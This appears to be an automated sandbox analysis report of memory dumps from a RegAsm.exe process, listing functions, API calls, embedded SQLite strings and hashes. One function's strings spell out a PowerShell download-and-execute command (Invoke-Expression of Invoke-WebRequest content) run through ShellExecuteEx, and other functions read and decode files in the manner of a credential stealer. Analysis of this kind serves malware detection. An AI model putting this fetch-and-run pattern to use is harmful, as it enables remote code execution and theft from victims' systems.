Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: bf29fb18140a9957d4d1700f9e8fc6c8e8a12fdec19ec975085d1ed94cbc42cc
Instruction ID: e4889c81059827b6ec985736a5244000d01a6270d2ee1312a0193de1d89654ca
Opcode Fuzzy Hash: bf29fb18140a9957d4d1700f9e8fc6c8e8a12fdec19ec975085d1ed94cbc42cc
Instruction Fuzzy Hash: 995127718002129FC7129F28DD48B5B77ACEF84755F5D412DEC8997281D736EA0ACBE1

Uniqueness

Uniqueness Score: -1.00%

Function 19833420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19833548, 19833594
API called with finalized prepared statement, xrefs: 1983352C, 19833588
ATTACH x AS %Q, xrefs: 1983346F
misuse, xrefs: 19833552, 1983359E
API called with NULL prepared statement, xrefs: 19833517
%s at line %d of [%.10s], xrefs: 19833557, 198335A3

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 77970a72825185d88ed83d2c1f92bd3a28e76b98827972269f1a4c9d323ce529
Instruction ID: b5a1fb3608103bc56139f1541910ae4de5fbde80f3261cb44f41bb1fc423cb7d
Opcode Fuzzy Hash: 77970a72825185d88ed83d2c1f92bd3a28e76b98827972269f1a4c9d323ce529
Instruction Fuzzy Hash: 92D1B0B09043819FD7108F38C885B5B77E8BF50756FC8452EE85A9A381E735E649CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 19852B70 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 183COMMON

Download Yara Rule

Strings

YHI;, xrefs: 19852B76
%c"%s", xrefs: 19852C1B
ABLE x, xrefs: 19852BB6
,schema HIDDEN, xrefs: 19852CD2
,arg HIDDEN, xrefs: 19852C7A
("%s", xrefs: 19852C4A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x$YHI;
API String ID: 0-513083281
Opcode ID: cdb16b992e26536a6d3a775144b99b087c2b24513b1cdfe1f3a9c39a524a2d7e
Instruction ID: c266f785ac492ea8376f8bdf252fdfe56dd3aa76ee6b259b62e5afd683eabfce
Opcode Fuzzy Hash: cdb16b992e26536a6d3a775144b99b087c2b24513b1cdfe1f3a9c39a524a2d7e
Instruction Fuzzy Hash: 5271A4749083859FD314CF68C840B5ABBE0FF98304F488A5EF99A97241E775E64DCB92

Uniqueness

Uniqueness Score: -1.00%

Function 19904B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19904C2A
API called with finalized prepared statement, xrefs: 19904C1E
SELECT * FROM %Q.%Q, xrefs: 19904B25
UNIQUE constraint failed: %s.%s, xrefs: 19904BC9
misuse, xrefs: 19904C34
%s at line %d of [%.10s], xrefs: 19904C39
rtree constraint failed: %s.(%s<=%s), xrefs: 19904BF9

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: fafacfb2bb8c560fcae9de1aa59737e53bf03808573831e5181b7e5e6c0a1e1b
Instruction ID: 79748cd1be8e9fa673a3d6815cbd4d3df02276913c9f4ac1e81bf7b1991715d1
Opcode Fuzzy Hash: fafacfb2bb8c560fcae9de1aa59737e53bf03808573831e5181b7e5e6c0a1e1b
Instruction Fuzzy Hash: 48412671900264AFE3018F799C94F9B33ACEF81A44F0C452CFC59D6281F722B959C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 199B7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname1, xrefs: 199B7CC9
%s%c%s, xrefs: 199B7C7A
winFullPathname2, xrefs: 199B7D35

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: 7fc58046d9d6b74c0d2e55f6fdb28e9bfeb1f7913c6a38cb216729d7b8c55f0e
Instruction ID: 19a3fd552bfa1d81002d3539d0db8015052defdd8357585af642cbbc318ebea2
Opcode Fuzzy Hash: 7fc58046d9d6b74c0d2e55f6fdb28e9bfeb1f7913c6a38cb216729d7b8c55f0e
Instruction Fuzzy Hash: 5141AD669043402FE7225638FC85F6F3B9DAF81614F4C822DF8CB5D1C1E62BE846C262

Uniqueness

Uniqueness Score: -1.00%

Function 199AAAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199AAB0B, 199AAB4C, 199AABA0
API called with finalized prepared statement, xrefs: 199AAAEF
misuse, xrefs: 199AAB15, 199AAB56, 199AABAA
API called with NULL prepared statement, xrefs: 199AAAD9
bind on a busy prepared statement: [%s], xrefs: 199AAB94
%s at line %d of [%.10s], xrefs: 199AAB1A, 199AAB5B, 199AABAF

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: 08cdb3f28de88c1fc4055dcfb95a4d41124c35497f1b34e97088b467153cd42d
Instruction ID: 6515367f6b64fadadf6ff05208ede40d797a81773fa8cdcdf35e608dfff06072
Opcode Fuzzy Hash: 08cdb3f28de88c1fc4055dcfb95a4d41124c35497f1b34e97088b467153cd42d
Instruction Fuzzy Hash: C441FE70650600ABE710CB7CDC81FD672AABF80B05F4D442DF9999B2C1E77AE588D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00411814 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411819
memset.MSVCRT ref: 0041183A
memset.MSVCRT ref: 00411848

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

lstrcat.KERNEL32(?,00000000), ref: 00411874
lstrcat.KERNEL32(?), ref: 00411892
lstrcat.KERNEL32(?,?), ref: 004118A6
lstrcat.KERNEL32(?), ref: 004118B9

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Part of subcall function 0040FA1A: GlobalAlloc.KERNEL32(00000000,00411947,?,00000000,?,00411947,?,?), ref: 0040FA25

StrStrA.SHLWAPI(00000000), ref: 00411953
GlobalFree.KERNEL32(?), ref: 00411A22

Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
Part of subcall function 004061EF: LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
Part of subcall function 004061EF: LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242

Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED

lstrcat.KERNEL32(?,00000000), ref: 004119C8
StrCmpCA.SHLWAPI(?,00424477,?,?,?,?,000003E8), ref: 004119E5
lstrcat.KERNEL32(?,?), ref: 004119FE
lstrcat.KERNEL32(?,004247F4), ref: 00411A0C

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 174962345-0
Opcode ID: bd521fdace08ffada53815f5a7f0b88e1755baff1bb916919acc6fc2ceb26861
Instruction ID: 5ad5729dd416ef83487245d11710288c189482e0d5d9af95a652990cc7d88096
Opcode Fuzzy Hash: bd521fdace08ffada53815f5a7f0b88e1755baff1bb916919acc6fc2ceb26861
Instruction Fuzzy Hash: 28612AB2D01119ABCF10EBA1DC469EE7BBDEF08304F00047AF615B2151EA399A588BA5

Uniqueness

Uniqueness Score: -1.00%

Function 1994ECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

docsize, xrefs: 1994F020
content, xrefs: 1994EFDF

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: content$docsize
API String ID: 0-1024698521
Opcode ID: 4790280ff5728b3fbc2df324ceecbd4e36321b7457150592bb50a0d26234d821
Instruction ID: 3e518154c15e28bb3c5d6f2fed61d8718aab55a9c873c4d5def04e7836552e6e
Opcode Fuzzy Hash: 4790280ff5728b3fbc2df324ceecbd4e36321b7457150592bb50a0d26234d821
Instruction Fuzzy Hash: CCC1F171908312ABD313CF68C985B6B73E8AF80354F69452CFD8597290D372F985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00411268 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 310COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041126D

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

ShellExecuteEx.SHELL32(0000003C), ref: 0041163C

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

C:\ProgramData\, xrefs: 00411401
Invoke-Expression (Invoke-WebRequest -Uri ", xrefs: 00411369
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004113D2
"" , xrefs: 004114C1
C:\ProgramData\, xrefs: 004112D5
.ps1, xrefs: 0041133F
<, xrefs: 004115F4
*.ps1, xrefs: 004112B2
" -UseBasicParsing).Content, xrefs: 0041138D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 585178538-186952963
Opcode ID: 1b010a9bdfb538d226b27d14283e0e96e20421f4c3b61436a55ea9dddb675daa
Instruction ID: 52cafcdc57b90aa499f2c3c6c20a6af37ba43037423e94f5d444e485c31820c4
Opcode Fuzzy Hash: 1b010a9bdfb538d226b27d14283e0e96e20421f4c3b61436a55ea9dddb675daa
Instruction Fuzzy Hash: 92D16E71C00288EADB05EBE2D956BDDBBB8AF14308F1444AEE505732C2DF781B19DB65

Uniqueness

Uniqueness Score: -1.00%

Function 198D5470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 198D5697
%lld, xrefs: 198D550D
%!0.15g, xrefs: 198D54D2

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: 5203c7f1cc14bd9523a67a291eeedfd8e7535c04b2941411f35adfacde0ee157
Instruction ID: 865da94d31fa98665a7c50e52c963bca619dc2129c233f0e95e5136f3707a063
Opcode Fuzzy Hash: 5203c7f1cc14bd9523a67a291eeedfd8e7535c04b2941411f35adfacde0ee157
Instruction Fuzzy Hash: 0151AB7A5003006BE3116A1CEC41FBA37E6EF92735F1C424EF951462C6EB67B19182B2

Uniqueness

Uniqueness Score: -1.00%

Function 198CAA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198CAAB8, 198CAD82
API called with finalized prepared statement, xrefs: 198CAA9C, 198CAD76
misuse, xrefs: 198CAAC2, 198CAD8C
API called with NULL prepared statement, xrefs: 198CAA87
%s at line %d of [%.10s], xrefs: 198CAAC7, 198CAD91

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 3b9858eaafbccbe0c336a31971d9d7356c013792b5e0bbc57019ddd262068822
Instruction ID: 4f9153f336c3c4f7711dad5a0eba907e3d1ee344b2f3c94b8052c438b32eb525
Opcode Fuzzy Hash: 3b9858eaafbccbe0c336a31971d9d7356c013792b5e0bbc57019ddd262068822
Instruction Fuzzy Hash: 19B116B4A003459FE7108F38DC45B9BB3E8AF50716F0C452CE99A87281E77AF449C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19853D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

=%Q, xrefs: 19853E7F
%Q., xrefs: 19853E11
PRAGMA , xrefs: 19853DC5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
